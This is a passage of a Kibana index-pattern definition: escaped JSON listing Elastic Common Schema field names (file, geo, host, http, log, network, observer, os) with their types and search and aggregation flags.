\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"file.hash.md5\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"file.hash.sha1\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"file.hash.sha256\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"file.hash.sha512\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"file.inode\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"file.mime_type\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"file.mode\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"file.mtime\",\"type\":\"date\",\"esTypes\":[\"date\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"file.name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"file.owner\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"file.path\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"file.path.text\",\"type\":\"string\",\"esTypes\":[\"text\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false,\"subType\":{\"multi\":{\"parent\":\"file.path\"}}},{\"count\":0,\"name\":\"file.pe.company\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"file.pe.description\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"file.pe.file_version\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"file.pe.original_file_name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"file.pe.product\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"file.size\",\"type\":\"number\",\"esTypes\":[\"long\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"file.target_path\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"file.target_path.text\",\"type\":\"string\",\"esTypes\":[\"text\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false,\"subType\":{\"multi\":{\"parent\":\"file.target_path\"}}},{\"count\":0,\"name\":\"file.type\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"file.uid\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"geo.city_name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"geo.continent_name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"geo.country_iso_code\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"geo.country_name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"geo.location\",\"type\":\"geo_point\",\"esTypes\":[\"geo_point\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"geo.name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"geo.region_iso_code\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"geo.region_name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"group.domain\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"group.id\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"group.name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"hash.md5\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"hash.sha1\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"hash.sha256\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"hash.sha512\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"host.architecture\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"host.domain\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"host.geo.city_name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"host.geo.continent_name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"host.geo.country_iso_code\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"host.geo.country_name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"host.geo.location\",\"type\":\"geo_point\",\"esTypes\":[\"geo_point\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"host.geo.name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"host.geo.region_iso_code\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"host.geo.region_name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"host.hostname\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"host.id\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"host.ip\",\"type\":\"ip\",\"esTypes\":[\"ip\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"host.mac\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"host.name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"host.os.family\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"host.os.full\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"host.os.full.text\",\"type\":\"string\",\"esTypes\":[\"text\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false,\"subType\":{\"multi\":{\"parent\":\"host.os.full\"}}},{\"count\":0,\"name\":\"host.os.kernel\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"host.os.name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"host.os.name.text\",\"type\":\"string\",\"esTypes\":[\"text\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false,\"subType\":{\"multi\":{\"parent\":\"host.os.name\"}}},{\"count\":0,\"name\":\"host.os.platform\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"host.os.version\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"host.type\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"host.uptime\",\"type\":\"number\",\"esTypes\":[\"long\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"host.user.domain\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"host.user.email\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"host.user.full_name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"host.user.full_name.text\",\"type\":\"string\",\"esTypes\":[\"text\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false,\"subType\":{\"multi\":{\"parent\":\"host.user.full_name\"}}},{\"count\":0,\"name\":\"host.user.group.domain\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"host.user.group.id\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"host.user.group.name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"host.user.hash\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"host.user.id\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"host.user.name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"host.user.name.text\",\"type\":\"string\",\"esTypes\":[\"text\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false,\"subType\":{\"multi\":{\"parent\":\"host.user.name\"}}},{\"count\":0,\"name\":\"http.request.body.bytes\",\"type\":\"number\",\"esTypes\":[\"long\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"http.request.body.content\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"http.request.body.content.text\",\"type\":\"string\",\"esTypes\":[\"text\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false,\"subType\":{\"multi\":{\"parent\":\"http.request.body.content\"}}},{\"count\":0,\"name\":\"http.request.bytes\",\"type\":\"number\",\"esTypes\":[\"long\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"http.request.method\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"http.request.referrer\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"http.response.body.bytes\",\"type\":\"number\",\"esTypes\":[\"long\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"http.response.body.content\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"http.response.body.content.text\",\"type\":\"string\",\"esTypes\":[\"text\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false,\"subType\":{\"multi\":{\"parent\":\"http.response.body.content\"}}},{\"count\":0,\"name\":\"http.response.bytes\",\"type\":\"number\",\"esTypes\":[\"long\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"http.response.status_code\",\"type\":\"number\",\"esTypes\":[\"long\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"http.version\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"interface.alias\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"interface.id\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"interface.name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"log.level\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"log.logger\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"log.origin.file.line\",\"type\":\"number\",\"esTypes\":[\"integer\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"log.origin.file.name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"log.origin.function\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"log.original\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":false,\"aggregatable\":false,\"readFromDocValues\":false},{\"count\":0,\"name\":\"log.syslog.facility.code\",\"type\":\"number\",\"esTypes\":[\"long\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"log.syslog.facility.name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"log.syslog.priority\",\"type\":\"number\",\"esTypes\":[\"long\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"log.syslog.severity.code\",\"type\":\"number\",\"esTypes\":[\"long\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"log.syslog.severity.name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"message\",\"type\":\"string\",\"esTypes\":[\"text\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"count\":0,\"name\":\"network.application\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"network.bytes\",\"type\":\"number\",\"esTypes\":[\"long\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"network.community_id\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"network.direction\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"network.forwarded_ip\",\"type\":\"ip\",\"esTypes\":[\"ip\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"network.iana_number\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"network.inner.vlan.id\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"network.inner.vlan.name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"network.name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"network.packets\",\"type\":\"number\",\"esTypes\":[\"long\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"network.protocol\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"network.transport\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"network.type\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"network.vlan.id\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"network.vlan.name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"observer.egress.interface.alias\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"observer.egress.interface.id\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"observer.egress.interface.name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"observer.egress.vlan.id\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"observer.egress.vlan.name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"observer.egress.zone\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"observer.geo.city_name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"observer.geo.continent_name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"observer.geo.country_iso_code\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"observer.geo.country_name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"observer.geo.location\",\"type\":\"geo_point\",\"esTypes\":[\"geo_point\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"observer.geo.name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"observer.geo.region_iso_code\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"observer.geo.region_name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"observer.hostname\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"observer.ingress.interface.alias\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"observer.ingress.interface.id\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"observer.ingress.interface.name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"observer.ingress.vlan.id\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"observer.ingress.vlan.name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"observer.ingress.zone\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"observer.ip\",\"type\":\"ip\",\"esTypes\":[\"ip\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"observer.mac\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"observer.name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"observer.os.family\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"observer.os.full\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"observer.os.full.text\",\"type\":\"string\",\"esTypes\":[\"text\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false,\"subType\":{\"multi\":{\"parent\":\"observer.os.full\"}}},{\"count\":0,\"name\":\"observer.os.kernel\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"observer.os.name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"observer.os.name.text\",\"type\":\"string\",\"esTypes\":[\"text\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false,\"subType\":{\"multi\":{\"parent\":\"observer.os.name\"}}},{\"count\":0,\"name\":\"observer.os.platform\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"observer.os.version\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"observer.product\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"observer.serial_number\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"observer.type\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"observer.vendor\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"observer.version\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"organization.id\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"organization.name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"organization.name.text\",\"type\":\"string\",\"esTypes\":[\"text\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false,\"subType\":{\"multi\":{\"parent\":\"organization.name\"}}},{\"count\":0,\"name\":\"os.family\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"os.full\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"os.full.text\",\"type\":\"string\",\"esTypes\":[\"text\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false,\"subType\":{\"multi\":{\"parent\":\"os.full\"}}},{\